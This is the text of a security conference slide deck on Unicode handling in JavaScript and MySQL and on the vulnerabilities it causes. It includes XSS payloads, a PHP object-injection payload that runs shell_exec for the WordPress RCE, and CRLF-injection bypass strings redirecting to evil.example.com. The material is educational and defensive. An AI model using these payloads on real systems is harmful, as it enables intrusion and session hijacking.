Slide 1

Slide 1 text

@mathias · #ruhrsec Hacking with Unicode

Slide 2

Slide 2 text

@mathias

Slide 3

Slide 3 text

What we’ll cover
1. Unicode
2. Encodings for Unicode
3. Unicode in JavaScript
4. Unicode in MySQL
5. Hacking with Unicode

Slide 4

Slide 4 text

1. Unicode

Slide 5

Slide 5 text

code point unique name symbol/glyph

Slide 6

Slide 6 text

A LATIN CAPITAL LETTER A U+0041

Slide 7

Slide 7 text

a LATIN SMALL LETTER A U+0061

Slide 8

Slide 8 text

© COPYRIGHT SIGN U+00A9

Slide 9

Slide 9 text

☃ SNOWMAN U+2603

Slide 10

Slide 10 text

💩 PILE OF POO U+1F4A9

Slide 11

Slide 11 text

U+000000 → U+10FFFF

Slide 12

Slide 12 text

(0x10FFFF + 1) code points ↓ 17 planes (0xFFFF + 1) code points each
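
The arithmetic on this slide can be checked directly. The sketch below is an illustration only; `planeOf` is a hypothetical helper, and it returns a zero-based index (the slides number the planes from 1).

```javascript
// Total number of code points, and the size of a single plane.
const totalCodePoints = 0x10FFFF + 1;
const codePointsPerPlane = 0xFFFF + 1;

// 0x110000 / 0x10000
const planeCount = totalCodePoints / codePointsPerPlane;

// Hypothetical helper: zero-based plane index of a code point.
// Plane 0 is the BMP; planes 1 to 16 are the astral planes.
function planeOf(codePoint) {
  return codePoint >> 16;
}
```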

Slide 13

Slide 13 text

Unicode plane #1 U+0000 → U+FFFF Basic Multilingual Plane a.k.a. BMP

Slide 14

Slide 14 text

Unicode planes #2-17 U+010000 → U+10FFFF supplementary planes astral planes

Slide 15

Slide 15 text

2. Encodings

Slide 16

Slide 16 text

Number of bytes per code point
Code point range       UTF-8  UTF-16  UTF-32  UTF-EBCDIC  GB 18030
U+000000 – U+00007F    1      2       4       1           1
U+000080 – U+00009F    2      2       4       1           2 or 4 (*)
U+0000A0 – U+0003FF    2      2       4       2           2 or 4 (*)
U+000400 – U+0007FF    2      2       4       3           2 or 4 (*)
U+000800 – U+003FFF    3      2       4       3           2 or 4 (*)
U+004000 – U+00FFFF    3      2       4       4           2 or 4 (*)
U+010000 – U+03FFFF    4      4       4       4           4
U+040000 – U+10FFFF    4      4       4       5           4
(*) 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else
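
The UTF-8 and UTF-16 columns can be spot-checked from JavaScript. This is a minimal sketch that assumes a runtime with a global `TextEncoder` (browsers and recent Node.js versions); the helper names `utf8ByteLength` and `utf16ByteLength` are made up for illustration.

```javascript
// TextEncoder always encodes to UTF-8.
const encoder = new TextEncoder();

// Number of bytes the string occupies in UTF-8.
function utf8ByteLength(string) {
  return encoder.encode(string).length;
}

// JavaScript strings expose UTF-16 code units, each two bytes wide.
function utf16ByteLength(string) {
  return string.length * 2;
}

const samples = {
  'U+0041': utf8ByteLength('\u0041'),     // LATIN CAPITAL LETTER A
  'U+00A9': utf8ByteLength('\u00A9'),     // COPYRIGHT SIGN
  'U+2603': utf8ByteLength('\u2603'),     // SNOWMAN
  'U+1F4A9': utf8ByteLength('\u{1F4A9}')  // PILE OF POO
};
```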

Slide 18

Slide 18 text

3. JavaScript " Unicode https://mths.be/jsu

Slide 19

Slide 19 text

Hexadecimal escape sequences
>> '\x41\x42\x43'
'ABC'
>> '\xA9 Caf\xE9 XYZ'
'© Café XYZ'
can be used for U+0000 → U+00FF

Slide 20

Slide 20 text

Unicode escape sequences
>> '\u0041\u0042\u0043'
'ABC'
>> 'I \u2661 JavaScript!'
'I ♡ JavaScript!'
can be used for U+0000 → U+FFFF

Slide 21

Slide 21 text

…what about astral code points?

Slide 22

Slide 22 text

…what about 💩?*
* …and other, equally important astral symbols

Slide 23

Slide 23 text

💩

Slide 24

Slide 24 text

Unicode code point escapes (ES6)
>> '\u{41}\u{42}\u{43}'
'ABC'
>> '\u{1F4A9}'
'💩' // U+1F4A9
can be used for U+000000 → U+10FFFF

Slide 25

Slide 25 text

Surrogate pairs
>> '\uD83D\uDCA9'
'💩' // U+1F4A9
can be used for U+010000 → U+10FFFF

Slide 26

Slide 26 text

Surrogate pairs
// for astral code points (> 0xFFFF)
function getSurrogates(codePoint) {
  var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800;
  var low = (codePoint - 0x10000) % 0x400 + 0xDC00;
  return [ high, low ];
}
function getCodePoint(high, low) {
  var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000;
  return codePoint;
}
>> getSurrogates(0x1F4A9); // U+1F4A9 is 💩
[ 0xD83D, 0xDCA9 ]
>> getCodePoint(0xD83D, 0xDCA9);
0x1F4A9
https://mths.be/bed
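
ES6 also ships built-ins that perform the same conversions, so the formulas rarely need to be written by hand. A short sketch using `String.fromCodePoint`, `String.prototype.codePointAt` and `String.prototype.charCodeAt`; the variable names are illustrative only.

```javascript
// Build the symbol from its code point.
const pileOfPoo = String.fromCodePoint(0x1F4A9);

// The two UTF-16 code units (surrogates) that make up the string.
const highSurrogate = pileOfPoo.charCodeAt(0);
const lowSurrogate = pileOfPoo.charCodeAt(1);

// Read the full code point back, starting at code unit index 0.
const codePoint = pileOfPoo.codePointAt(0);
```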

Slide 27

Slide 27 text

JavaScript string length
>> 'A'.length // U+0041
1
>> 'A' == '\u0041'
true
>> 'B'.length // U+0042
1
>> 'B' == '\u0042'
true

Slide 28

Slide 28 text

String length ≠ char count
>> '𝐀'.length // U+1D400
2
>> '𝐀' == '\uD835\uDC00'
true
>> '𝐁'.length // U+1D401
2
>> '𝐁' == '\uD835\uDC01'
true

Slide 30

Slide 30 text

String length ≠ char count
>> '💩'.length // U+1F4A9
2
>> '💩' == '\uD83D\uDCA9'
true
insert obligatory “number two” joke here

Slide 31

Slide 31 text

Real-world example

Slide 32

Slide 32 text

Real-world example

Slide 33

Slide 33 text

No content

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

String character count
function countSymbols(string) {
  return punycode.ucs2.decode(string).length;
}
>> countSymbols('A') // U+0041
1
>> countSymbols('𝐀') // U+1D400
1
>> countSymbols('💩') // U+1F4A9
1
https://mths.be/punycode

Slide 36

Slide 36 text

String character count (ES6)
function countSymbols(string) {
  return Array.from(string).length;
}
>> countSymbols('A') // U+0041
1
>> countSymbols('𝐀') // U+1D400
1
>> countSymbols('💩') // U+1F4A9
1

Slide 37

Slide 37 text

String character count (ES6)
function countSymbols(string) {
  return [...string].length;
}
>> countSymbols('A') // U+0041
1
>> countSymbols('𝐀') // U+1D400
1
>> countSymbols('💩') // U+1F4A9
1

Slide 38

Slide 38 text

JavaScript escape sequences http://mths.be/bmf

Slide 40

Slide 40 text

If we’re being pedantic…
// it’s actually even more complicated:
>> 'mañana' == 'mañana'
false
>> 'ma\xF1ana' == 'man\u0303ana'
false
>> 'ma\xF1ana'.length
6
>> 'man\u0303ana'.length
7

Slide 41

Slide 41 text

Unicode normalization (ES6)
function countSymbolsPedantically(string) {
  // Unicode Normalization, NFC form:
  var normalized = string.normalize('NFC');
  // Account for astral symbols / surrogates:
  return Array.from(normalized).length;
}
>> countSymbolsPedantically('mañana') // U+00F1
6
>> countSymbolsPedantically('mañana') // U+006E + U+0303
6
http://git.io/unorm

Slide 42

Slide 42 text

Perfect? >> var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ ';

Slide 43

Slide 43 text

Perfect? Nope. → can be ‘fixed’ using epic regex-fu >> var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ '; >> countSymbolsPedantically(zalgo) 116 // not 9
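
One possible shape for the “regex-fu” is sketched below. It is an assumption about the approach, not the code from the talk: it relies on Unicode property escapes (`\p{M}` with the `u` flag, available in modern engines) to drop combining marks before counting, and the function name is hypothetical.

```javascript
// Matches one non-mark symbol followed by one or more combining marks.
const symbolWithCombiningMarks = /(\P{M})\p{M}+/gu;

function countSymbolsIgnoringCombiningMarks(string) {
  // Keep only the base symbol of each sequence.
  const stripped = string.replace(symbolWithCombiningMarks, '$1');
  // Account for astral symbols / surrogates.
  return Array.from(stripped).length;
}
```

This counts a base symbol plus any number of stacked marks as one symbol. Marks that have no base symbol in front of them are still counted individually.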

Slide 48

Slide 48 text

Reversing a string in JavaScript
// naive solution
function reverse(string) {
  return string.split('').reverse().join('');
}
>> reverse('abc')
'cba'
>> reverse('mañana') // U+00F1
'anañam'
>> reverse('mañana') // U+006E + U+0303
'anãnam'
>> reverse('💩') // U+1F4A9
'��'
'\uDCA9\uD83D' // the surrogate pair for 💩, in the wrong order

Slide 49

Slide 49 text

“I put my thang down, flip it, and reverse it”
Missy ‘Misdemeanor’ Elliott, 2002

Slide 50

Slide 50 text

Reversing a string in JavaScript
// Using the Esrever library
var reverse = esrever.reverse;
>> reverse('abc')
'cba'
>> reverse('mañana') // U+00F1
'anañam'
>> reverse('mañana') // U+006E + U+0303
'anañam'
>> reverse('💩') // U+1F4A9
'💩'
https://mths.be/esrever
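
For comparison, here is a minimal sketch that reverses by code point instead of by code unit. It is not how Esrever is implemented; `reverseCodePoints` is a hypothetical name. It keeps surrogate pairs intact but, unlike Esrever, still detaches combining marks from their base symbol.

```javascript
function reverseCodePoints(string) {
  // Array.from iterates by code point, so surrogate pairs stay together.
  return Array.from(string).reverse().join('');
}

// Astral symbols survive:
const reversedAstral = reverseCodePoints('ab\u{1F4A9}');

// Combining marks do not: the tilde ends up on the preceding 'a'.
const reversedCombining = reverseCodePoints('man\u0303ana');
```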

Slide 51

Slide 51 text

Iterate over all symbols in a string
function getSymbols(string) {
  var length = string.length;
  var index = -1;
  var output = [];
  var character;
  var charCode;
  while (++index < length) {
    character = string.charAt(index);
    charCode = character.charCodeAt(0);
    if (charCode >= 0xD800 && charCode <= 0xDBFF) {
      // note: this doesn’t account for lone high surrogates
      output.push(character + string.charAt(++index));
    } else {
      output.push(character);
    }
  }
  return output;
}
var symbols = getSymbols('💩');
symbols.forEach(function(symbol) {
  assert(symbol == '💩');
});

Slide 52

Slide 52 text

Iterate over all symbols in a string (ES6)
for (const symbol of '💩') {
  assert(symbol == '💩');
}

Slide 53

Slide 53 text

This behavior affects other string methods, too.

Slide 54

Slide 54 text

More string madness
• String.fromCharCode
• String#charAt
• String#substring
• String#slice
• …anything that involves strings
• oh, and regular expressions
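
A few of these can be seen going wrong with a single astral symbol. The sketch below uses only standard string and RegExp behavior; the variable names are illustrative.

```javascript
const poo = '\u{1F4A9}'; // PILE OF POO, stored as two code units

// charAt and slice operate on code units and return half a surrogate pair.
const firstUnit = poo.charAt(0);
const sliced = poo.slice(0, 1);

// Without the u flag, "." matches a single code unit, so this fails.
const matchesWithoutUnicodeFlag = /^.$/.test(poo);

// With the ES6 u flag, "." matches a whole code point.
const matchesWithUnicodeFlag = /^.$/u.test(poo);
```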

Slide 55

Slide 55 text

JavaScript has a Unicode problem https://mths.be/jsu

Slide 56

Slide 56 text

💩 The Pile of Poo Test™ https://mths.be/jsu

Slide 57

Slide 57 text

💩 is the new %00

Slide 58

Slide 58 text

4. MySQL " Unicode

Slide 59

Slide 59 text

CREATE TABLE `table_name` (
  `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
  `column_name` VARCHAR(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

Slide 61

Slide 61 text

mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
Query OK, 1 row affected, 1 warning (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 1
mysql> SHOW WARNINGS;
+---------+------+--------------------------------------------+
| Level   | Code | Message                                    |
+---------+------+--------------------------------------------+
| Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' |
|         |      | for column 'column_name' at row 1          |
+---------+------+--------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT column_name FROM table_name WHERE id = 9001;
+-------------+
| column_name |
+-------------+
| foo         |
+-------------+
1 row in set (0.00 sec)
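
MySQL’s utf8 character set stores at most three bytes per symbol, which covers only the BMP. The sketch below is a rough JavaScript model of what the session above shows, useful for spotting affected input on the application side. Both function names are hypothetical, and the truncation only mimics the non-strict behavior seen here.

```javascript
// Any code point outside the BMP needs four bytes in UTF-8.
const astralSymbol = /[\u{10000}-\u{10FFFF}]/u;

// Would this string lose data in a MySQL utf8 column?
function containsAstralSymbol(string) {
  return astralSymbol.test(string);
}

// Model of the truncation: everything from the first astral symbol on is dropped.
function truncateAtFirstAstralSymbol(string) {
  const index = string.search(astralSymbol);
  return index === -1 ? string : string.slice(0, index);
}
```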

Slide 65

Slide 65 text

✘ Same result as on slide 61: the UPDATE succeeds with a warning, and the stored value is truncated to 'foo'.

Slide 66

Slide 66 text

MySQL’s ✌utf8✌

Slide 67

Slide 67 text

ALTER TABLE `table_name`
  CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
https://mths.be/utf8mb4

Slide 70

Slide 70 text

mysql> UPDATE table_name SET column_name = 'foo💩bar' WHERE id = 9001;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
mysql> SELECT column_name FROM table_name WHERE id = 9001;
+-------------+
| column_name |
+-------------+
| foo💩bar    |
+-------------+
1 row in set (0.00 sec)
✔ https://mths.be/utf8mb4

Slide 71

Slide 71 text

5. Hacking with Unicode

Slide 72

Slide 72 text

http://mths.be/brk

Slide 73

Slide 73 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19
000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert|
000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script|
000003b0 … |> <./.p.>.....<.|
000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
000003e0

Slide 76

Slide 76 text

Same hexdump as on slide 73. Bytes 3c 73 read as one 16-bit unit: U+3C73 CJK UNIFIED IDEOGRAPH-3C73

Slide 77

Slide 77 text

Same hexdump as on slide 73. Bytes 63 72 read as one 16-bit unit: U+6372 CJK UNIFIED IDEOGRAPH-6372

Slide 78

Slide 78 text

Same hexdump as on slide 73. Bytes 69 70 read as one 16-bit unit: U+6970 CJK UNIFIED IDEOGRAPH-6970

Slide 79

Slide 79 text

http://mths.be/brm

Slide 80

Slide 80 text

http://mths.be/brm
∀㸀㰀script㸀alert(1)㰀/script㸀

Slide 81

Slide 81 text

$ hexdump -C utf-32-xss.html
00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
0000006c

Slide 83

Slide 83 text

Same hexdump as on slide 81. Bytes 00 00 22 00: ∀ (U+2200 FOR ALL)

Slide 84

Slide 84 text

Same hexdump as on slide 81. Bytes 00 00 3e 00: U+3E00 CJK UNIFIED IDEOGRAPH-3E00

Slide 85

Slide 85 text

Same hexdump as on slide 81. Bytes 00 00 3c 00: U+3C00 CJK UNIFIED IDEOGRAPH-3C00

Slide 86

Slide 86 text

Same hexdump as on slide 81. Bytes 00 00 00 73: s (U+0073 LATIN SMALL LETTER S)

Slide 87

Slide 87 text

No content

Slide 88

Slide 88 text

No content

Slide 89

Slide 89 text

https://mths.be/brl

Slide 90

Slide 90 text

https://mths.be/brl OBAMA vs. ᴼᴮᴬᴹᴬ

Slide 91

Slide 91 text

No content

Slide 92

Slide 92 text

https://mths.be/bvf

Slide 93

Slide 93 text

https://mths.be/bvf

Slide 94

Slide 94 text

JavaScript vs. JSON

Slide 95

Slide 95 text

// <?php echo strip($userInput); ?>

Slide 96

Slide 96 text

https://mths.be/brn

Slide 97

Slide 97 text

https://mths.be/brn

Slide 98

Slide 98 text

// <?php echo strip($userInput); ?> foo[U+2028]alert('XSS')

Slide 99

Slide 99 text

// <?php echo strip($userInput); ?> ✘ foo[U+2028]alert('XSS')

Slide 100

Slide 100 text

JSON ∉ JavaScript

Slide 101

Slide 101 text

var data = '"Hello\u2028"';
// JSON-formatted data containing a string
// containing an (unescaped!) Line Separator
eval('(' + data + ')');
// → SyntaxError: Unexpected token ILLEGAL
JSON.parse(data);
// → 'Hello\u2028'
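
A minimal way to sidestep this mismatch is to escape the two offending line terminators after serializing. This is a sketch, not the jsesc implementation; `stringifyForScript` is a hypothetical helper name.

```javascript
// Serialize a value as JSON, then escape U+2028 and U+2029, which JSON
// permits unescaped in strings but which JavaScript treats as line terminators.
function stringifyForScript(value) {
  return JSON.stringify(value)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const escaped = stringifyForScript('Hello\u2028');
```

The escaped output is still valid JSON and parses back to the same value, so it can be used wherever the unescaped form was.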

Slide 102

Slide 102 text

Always escape JSON-formatted data before passing it to a JavaScript parser. https://mths.be/jsesc

Slide 103

Slide 103 text

https://mths.be/jsesc

Slide 104

Slide 104 text

var data = 'foo\u2028';
var serialized = JSON.stringify(data);
// → '"foo\u2028"' (contains the raw, unescaped
// Unicode symbol)
var escaped = jsesc(data, { 'json': true });
// → '"foo\\u2028"' (contains an escape sequence
// for the Unicode symbol → safer)
JSON.parse(serialized) == JSON.parse(escaped);
// → true (both strings unserialize to the same value)
https://mths.be/jsesc

Slide 106

Slide 106 text

var string = String.fromCharCode(0xD800);
// a string containing an (unescaped!)
// lone surrogate
var data = JSON.stringify(string);
// the same string as JSON-formatted data
storeInDatabaseAsUtf8(data);
// → error/crash
sendOverWebSocketConnection(data);
// → error/crash/DoS
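
Lone surrogates can be detected before a string reaches a UTF-8 encoder. The following is a sketch of one way to do that by walking the code units; `hasLoneSurrogate` is a hypothetical helper, not part of jsesc.

```javascript
function hasLoneSurrogate(string) {
  for (let index = 0; index < string.length; index++) {
    const unit = string.charCodeAt(index);
    if (unit >= 0xD800 && unit <= 0xDBFF) {
      // High surrogate: must be followed by a low surrogate.
      const next = string.charCodeAt(index + 1); // NaN at end of string
      if (next >= 0xDC00 && next <= 0xDFFF) {
        index++; // skip the low half of a valid pair
        continue;
      }
      return true;
    }
    if (unit >= 0xDC00 && unit <= 0xDFFF) {
      // Low surrogate without a preceding high surrogate.
      return true;
    }
  }
  return false;
}
```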

Slide 107

Slide 107 text

Always escape JSON-formatted data before passing it to a UTF-8 encoder. https://mths.be/jsesc

Slide 108

Slide 108 text

https://mths.be/jsesc

Slide 109

Slide 109 text

var data = 'foo\uD800';
var serialized = JSON.stringify(data);
// → '"foo\uD800"' (contains the raw, unescaped
// Unicode symbol)
var escaped = jsesc(data, { 'json': true });
// → '"foo\\uD800"' (contains an escape sequence
// for the Unicode symbol → safer)
JSON.parse(serialized) == JSON.parse(escaped);
// → true (both strings unserialize to the same value)
https://mths.be/jsesc

Slide 111

Slide 111 text

Phabricator

Slide 112

Slide 112 text

No content

Slide 113

Slide 113 text

No content

Slide 114

Slide 114 text

No content

Slide 115

Slide 115 text

uses MySQL

Slide 116

Slide 116 text

uses MySQL’s ✌utf8✌

Slide 117

Slide 117 text

No content

Slide 118

Slide 118 text

No content

Slide 119

Slide 119 text

https://mths.be/bro

Slide 120

Slide 120 text

RCE in WordPress < 3.6.1 https://mths.be/brq

Slide 121

Slide 121 text

CVE-2013-4338 “wp-includes/functions.php in WordPress before 3.6.1 does not properly determine whether data has been serialize()d, which allows remote attackers to execute arbitrary code by triggering erroneous PHP unserialize() operations.” https://mths.be/brq

Slide 122

Slide 122 text

function is_serialized( $data ) {
  $data = trim( $data );
  $length = strlen( $data );
  $lastc = $data[$length - 1];
  if ( ';' !== $lastc && '}' !== $lastc )
    return false;
  $token = $data[0];
  switch ( $token ) {
    case 's' :
      if ( '"' !== $data[$length - 2] )
        return false;
    case 'a' :
    case 'O' :
      return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
    case 'b' :
    case 'i' :
    case 'd' :
      return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data );
  }
  return false;
}
https://mths.be/brq

Slide 125

Slide 125 text

WordPress (uses MySQL’s ✌utf8✌)
Before writing data to the database, it gets serialized only if it’s an array or an object, or if is_serialized($data) returns true (double serialization).
After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true.
https://mths.be/brq

Slide 126

Slide 126 text

http://mths.be/brq

Slide 127

Slide 127 text

http://mths.be/brq

Slide 128

Slide 128 text

class Foo {
  private $command;
  public function setCommand($command) {
    $this->command = $command;
  }
  public function __destruct() {
    if ($this->command) {
      shell_exec($this->command);
    }
  }
}
$object = new Foo();
$object->setCommand('echo "pwned!" > /tmp/pwned.txt');
$serialized = serialize($object);
$payload = $serialized . '💩';
https://mths.be/brq

Slide 129

Slide 129 text

https://mths.be/brq

Slide 130

Slide 130 text

RCE in Joomla < 3.4.6 https://mths.be/bvg

Slide 131

Slide 131 text

CVE-2015-8562 “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.” https://mths.be/bvg

Slide 132

Slide 132 text

Exploit
1. Serialize a specially crafted object containing PHP code to be executed
2. Use that as the HTTP User-Agent header value, with 💩 as suffix
https://mths.be/bvh

Slide 133

Slide 133 text

XSS in WordPress < 4.1.2 https://mths.be/buj

Slide 134

Slide 134 text

foo https://mths.be/buj Exploit: post comment

Slide 135

Slide 135 text

foo https://mths.be/buj Exploit: post comment This is safe HTML (no XSS).

Slide 136

Slide 136 text

foo https://mths.be/buj Exploit: post comment This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:

Slide 137

Slide 137 text

foo https://mths.be/buj Exploit: post comment foo This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:

Slide 138

Slide 138 text

https://mths.be/buj

Slide 139

Slide 139 text

TweetDeck

Slide 140

Slide 140 text

No content

Slide 141

Slide 141 text

No content

Slide 142

Slide 142 text

No content

Slide 143

Slide 143 text

function getTweetHtml(tweet) {
  var htmlEscapedTweet = htmlEscape(tweet);
  if (containsEmoji(htmlEscapedTweet)) {
    return replaceSymbolsWithImgTags(
      AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
    );
  } else {
    return htmlEscapedTweet;
  }
}
https://mths.be/bsq
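
For contrast, a sketch of the same flow without the unescaping step. Everything here is an assumption for illustration: the escape table, the rough emoji range U+1F300 to U+1FAFF, and the `/emoji/….png` image path are made up and are not TweetDeck’s code.

```javascript
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

function htmlEscape(text) {
  return text.replace(/[&<>"']/g, (character) => HTML_ESCAPES[character]);
}

// Rough assumption: treat this astral range as "emoji".
const EMOJI = /[\u{1F300}-\u{1FAFF}]/gu;

function getTweetHtml(tweet) {
  // Escape first, then replace symbols in the already-escaped text.
  // The escaped text is never converted back.
  const escaped = htmlEscape(tweet);
  return escaped.replace(EMOJI, (symbol) => {
    const hex = symbol.codePointAt(0).toString(16);
    return '<img alt="' + symbol + '" src="/emoji/' + hex + '.png">';
  });
}
```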

Slide 144

Slide 144 text

Twitter

Slide 145

Slide 145 text

https://mths.be/bsq https://mths.be/buh

Slide 147

Slide 147 text

Broken CRLF filtering ✘
symbol: LF + CR
code point: U+000A U+000D
URL-encoded (note: uses UTF-8!): %0A%0D
decoded (raw bytes): [ 0x0A, 0x0D ]
https://mths.be/buh

Slide 148

Slide 148 text

Bypass part 1: LF (U+000A)
symbol: 嘊
code point: U+560A
URL-encoded (note: uses UTF-8!): %E5%98%8A
decoded (raw bytes): [ 0x56, 0x0A ]
https://mths.be/buh

Slide 149

Slide 149 text

Bypass part 2: CR (U+000D)
symbol: 嘍
code point: U+560D
URL-encoded (note: uses UTF-8!): %E5%98%8D
decoded (raw bytes): [ 0x56, 0x0D ]
https://mths.be/buh

Slide 150

Slide 150 text

https://mths.be/buh Example exploit %E5%98%8A%E5%98%8DSet-Cookie:%20test
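
The numbers in the bypass can be reproduced in a few lines. The sketch assumes that the vulnerable component keeps only the low byte of each 16-bit code unit; that is a simplified model of the flaw, and `keepLowBytes` is a hypothetical name.

```javascript
// The two CJK symbols used in the bypass.
const payloadSymbols = '\u560A\u560D';

// URL encoding uses UTF-8, so neither %0A nor %0D appears in the request.
const urlEncoded = encodeURIComponent(payloadSymbols);

// Simplified model of the flaw: drop the high byte of every code unit.
function keepLowBytes(string) {
  const bytes = [];
  for (let index = 0; index < string.length; index++) {
    bytes.push(string.charCodeAt(index) & 0xFF);
  }
  return bytes;
}

const resultingBytes = keepLowBytes(decodeURIComponent(urlEncoded));
```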

Slide 151

Slide 151 text

No content

Slide 152

Slide 152 text

https://mths.be/bve

Slide 155

Slide 155 text

Bypass part 1: LF (U+000A)
symbol: 嘊
code point: U+560A
URL-encoded (note: uses UTF-8!): %E5%98%8A
decoded (raw bytes): [ 0x56, 0x0A ]
https://mths.be/bve

Slide 156

Slide 156 text

Bypass part 2: CR (U+000D)
symbol: 嘍
code point: U+560D
URL-encoded (note: uses UTF-8!): %E5%98%8D
decoded (raw bytes): [ 0x56, 0x0D ]
https://mths.be/bve

Slide 157

Slide 157 text

Example exploit
%E5%98%8A%E5%98%8DLocation:%20https:%2F%2Fevil.example.com%2F
https://mths.be/bve

Slide 158

Slide 158 text

Thanks! Questions? → @mathias